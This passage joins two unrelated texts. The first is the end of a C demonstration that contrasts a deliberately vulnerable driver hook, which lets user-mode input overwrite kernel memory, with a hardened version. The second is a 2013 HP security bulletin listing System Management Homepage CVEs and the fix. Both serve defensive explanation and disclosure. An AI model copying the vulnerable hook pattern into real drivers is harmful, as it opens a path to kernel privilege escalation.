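    printf("vulnerable hook: kernel word is now 0x%08x\n", read32(KERNEL_BASE));

    model_reset();
    uint32_t st = hook_hardened(UserMode, KERNEL_BASE, 0x1000u);
    printf("hardened hook:   status 0x%08x, kernel word 0x%08x\n", st, read32(KERNEL_BASE));
    return 0;
}
```

The check has to key off the caller's previous mode rather than the pointer alone: the same hook is reached by kernel components that legitimately pass kernel addresses, and probing those would break them. In a real driver the probe and the store both sit inside the same __try/__except block, because a user page can be unmapped between the probe and the write.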
[security bulletin] HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03839862
Version: 1

HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-18
Last Updated: 2013-07-18

Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS.

References:
  CVE-2011-3389 (SSRT100740)                Remote disclosure of information
  CVE-2012-0883 (SSRT101209)                Remote gain extended privileges
  CVE-2012-2110 (SSRT101210)                Remote Denial of Service (DoS)
  CVE-2012-2311 (SSRT100992)                Remote execution of arbitrary code
  CVE-2012-2329 (SSRT100992)                Remote Denial of Service (DoS)
  CVE-2012-2335 (SSRT100992)                Remote execution of arbitrary code
  CVE-2012-2336 (SSRT100992)                Remote Denial of Service (DoS)
  CVE-2013-2355 (SSRT100696)                Remote unauthorized access
  CVE-2013-2356 (SSRT100835)                Remote disclosure of information
  CVE-2013-2357 (SSRT100907)                Remote Denial of Service (DoS)
  CVE-2013-2358 (SSRT100907)                Remote Denial of Service (DoS)
  CVE-2013-2359 (SSRT100907)                Remote Denial of Service (DoS)
  CVE-2013-2360 (SSRT100907)                Remote Denial of Service (DoS)
  CVE-2013-2361 (SSRT101007)                XSS
  CVE-2013-2362 (SSRT101076, ZDI-CAN-1676)  Local Denial of Service (DoS)
  CVE-2013-2363 (SSRT101150)                Remote disclosure of information
  CVE-2013-2364 (SSRT101151)                XSS
  CVE-2013-5217 (SSRT101137)                Remote unauthorized access

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference         Base Vector                  Base Score
  CVE-2011-3389     (AV:N/AC:M/Au:N/C:P/I:N/A:N)    4.3
  CVE-2012-0883     (AV:L/AC:M/Au:N/C:C/I:C/A:C)    6.9
  CVE-2012-2110     (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
  CVE-2012-2311     (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
  CVE-2012-2329     (AV:N/AC:L/Au:N/C:N/I:N/A:P)    5.0
  CVE-2012-2335     (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
  CVE-2012-2336     (AV:N/AC:L/Au:N/C:N/I:N/A:P)    5.0
  CVE-2013-2355     (AV:N/AC:M/Au:N/C:P/I:N/A:N)    4.3
  CVE-2013-2356     (AV:N/AC:L/Au:N/C:C/I:N/A:N)    7.8
  CVE-2013-2357     (AV:N/AC:M/Au:S/C:N/I:N/A:C)    6.3
  CVE-2013-2358     (AV:N/AC:M/Au:S/C:N/I:N/A:C)    6.3
  CVE-2013-2359     (AV:N/AC:M/Au:S/C:N/I:N/A:P)    3.5
  CVE-2013-2360     (AV:N/AC:M/Au:S/C:N/I:N/A:P)    3.5
  CVE-2013-2361     (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
  CVE-2013-2362     (AV:L/AC:H/Au:S/C:N/I:N/A:P)    1.0
  CVE-2013-2363     (AV:N/AC:H/Au:N/C:C/I:N/A:P)    6.1
  CVE-2013-2364     (AV:N/AC:L/Au:S/C:N/I:N/A:P)    4.0
  CVE-2013-5217     (AV:N/AC:H/Au:N/C:P/I:N/A:N)    2.6
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-al...@hp.com

RESOLUTION

HP has made System Management Homepage (SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities.

Information and updates for SMH can be found at the following location:
http://h18013.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) - 18 July 2013 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is